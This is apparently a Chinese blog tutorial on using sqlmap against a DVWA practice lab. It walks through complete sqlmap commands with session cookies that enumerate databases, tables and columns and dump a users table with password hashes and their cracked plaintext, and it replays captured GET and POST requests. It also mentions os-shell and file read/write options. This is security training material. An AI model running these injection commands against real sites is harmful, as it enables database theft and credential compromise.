手把手带你学习SQLMAP

本文以【黑客笔记在线dvwa靶场】中的SQL注入为例子（靶场有效期：2019年），讲解SqlMap的基础用法。靶场有效期内，聪明机智的你可以在上面试验一把，体验实战的感觉。

SQL注入基本战术：

1.Union注入
2.Boolean注入
3.报错注入
4.时间注入
5.堆叠注入
6.二次注入
7.宽字节注入
8.大小写绕过注入
9.编码绕过注入
10.内联注释绕过注入

基础准备：F12获取Cookie

可以看到这里咱们的Cookie是，security=low表示咱们现在处于简单模式。

 security=low; PHPSESSID=is56nfk4e80i5l3ia2qohge711

启动：添加Cookie，使用sqlmap尝试注入

结果：存在SQL注入漏洞

获取数据库：--dbs

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" --dbs

这里我们获得MySQL数据库：dvwa和information_schema，接下来以dvwa做分析。为什么要选择dvwa数据库呢？实际上是通过--current-db参数来获取到的。

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" --current-db

这里可以看到，咱们这个漏洞靶场使用的数据库是dvwa。

获取数据库中的表名：--tables

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" -D dvwa --tables

从dvwa数据库里面，我们获得到guestbook和users表，接下来我们用users表做分析。选哪张表，你可以看当时自己的心情。

获取表中的字段名：--columns

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" -D dvwa -T users --columns

从dvwa数据库的users表获取到：

+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

获取表中的字段内容：--dump

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" -D dvwa -T users -C user,avatar,failed_login,first_name,last_login,last_name,password,user_id --dump

这个时候我们获得了dvwa数据库，users表中的所有字段的内容，在这里可以清晰的看到user字段对应的password字段的值，这就是拖库的基本原理，学会了的给个赞。

Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------+--------------+------------+---------------------+-----------+---------------------------------------------+---------+
| user    | avatar                      | failed_login | first_name | last_login          | last_name | password                                    | user_id |
+---------+-----------------------------+--------------+------------+---------------------+-----------+---------------------------------------------+---------+
| admin   | /hackable/users/admin.jpg   | 2            | admin      | 2019-12-06 02:10:52 | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 1       |
| gordonb | /hackable/users/gordonb.jpg | 0            | Gordon     | 2019-11-29 10:08:39 | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | 2       |
| 1337    | /hackable/users/1337.jpg    | 0            | Hack       | 2019-11-29 10:08:39 | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | 3       |
| pablo   | /hackable/users/pablo.jpg   | 0            | Pablo      | 2019-11-29 10:08:39 | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | 4       |
| smithy  | /hackable/users/smithy.jpg  | 0            | Bob        | 2019-11-29 10:08:39 | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 5       |
+---------+-----------------------------+--------------+------------+---------------------+-----------+---------------------------------------------+---------+

获取当前数据库的用户名：

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" --current-user

这是咱们在上一篇文章（ailx10：手把手带你搭建漏洞靶场）中设置的：

获取当前数据库用户名的密码：

sqlmap -u "http://144.34.183.197/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low;PHPSESSID=is56nfk4e80i5l3ia2qohge711" --passwords --thread 10 --hex

权限不够，拿不到用户名为dvwa的MySQL登陆密码。

mysql数据库的登陆用户名唯一为：root，其他用户都不能登陆。

后面一系列的黑科技，由于权限不够，暂时就不分析了，下次有机会咱们再碰一碰。相反，这也说明了权限的重要性。

--sql-shell 运行自定义sQL语句
--os-shell 运行任意操作系统命令
--file-read 从数据库服务器中读取文件
--file-write  & --file-dest 上传文件到数据库服务器中

【GET】请求：F12制作请求文本

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=low; PHPSESSID=is56nfk4e80i5l3ia2qohge711

SqlMap重放【GET】请求文本

sqlmap -r get-sql.txt

美滋滋，成功了～

我们将实验从low级别提高到medium级别。

可以看到这里咱们的Cookie是，security=medium表示咱们现在处于中级模式。

Cookie: security=medium; PHPSESSID=is56nfk4e80i5l3ia2qohge711

【POST】请求，F12制作请求文本

注意这里请求头和请求体中间有一行空格哦～

POST /DVWA/vulnerabilities/sqli/ HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Content-Length: 18
Cache-Control: max-age=0
Origin: http://144.34.183.197
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=medium; PHPSESSID=is56nfk4e80i5l3ia2qohge711id=2&Submit=Submit

SqlMap重放【POST】请求文本

sqlmap -r post-sql.txt

美滋滋，成功了，抓包重放，屡试不爽，学会的给个赞～

那么POST请求如何获取数据库呢？

sqlmap -r post-sql.txt --dbs

POST请求如何获取数据库中的表信息呢？

sqlmap -r post-sql.txt -D dvwa --tables

POST请求如何获取数据库表中的字段信息呢？

sqlmap -r post-sql.txt -D dvwa -T users --columns

POST请求如何获取数据库表中字段内容呢？

sqlmap -r post-sql.txt -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

下一篇：手把手带你学习BurpSuite（ailx10：手把手带你学习BurpSuite）